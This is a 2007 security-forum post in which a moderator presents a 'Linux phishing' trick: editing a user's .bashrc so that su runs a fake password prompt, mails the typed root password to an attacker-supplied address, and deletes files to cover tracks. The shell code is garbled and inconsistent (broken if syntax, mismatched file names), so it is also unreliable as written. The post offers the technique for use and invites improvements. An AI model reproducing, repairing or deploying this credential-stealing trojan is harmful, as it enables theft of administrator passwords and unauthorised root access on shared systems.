|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 152
Members: 0
Total: 152
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Linux / *nix Phishing . huh ? |
|
Posted: Sun Sep 02, 2007 5:22 pm |
|
|
ToXiC |
Moderator |
|
|
Joined: Dec 01, 2004 |
Posts: 181 |
Location: Cyprus |
|
|
|
|
|
|
maybe a new concept on phishing.
You can receive the root password on your email in plain text . They only thing you need is user access to modify .bashrc
lets see the procedure step by step:
you first copy the .bashrc to .bashrc. so you can restore it and cover your tracks after you receive the password.
you then modify .bashrc as follows:
.bashrc
alias su=/var/tmp/text.log
echo "Password:";read pass
if [ $pass = "" ] > .es
echo "su: incorrect password"
echo $pass > /tmp/pass.log
mail yourmail@mail.com < /tmp/pass.log
rm /tmp/pass.log
then
rm .es
rm /var/tmp/test.log
cp ~/.bashrc. ~/.bashrc
rm ~/.bashrc.
su
fi
chmod +x /var/tmp/text.log
Let me know of any improvements or Suggestions . |
|
_________________ who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com |
|
|
|
|
www.waraxe.us Forum Index -> Linux world
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|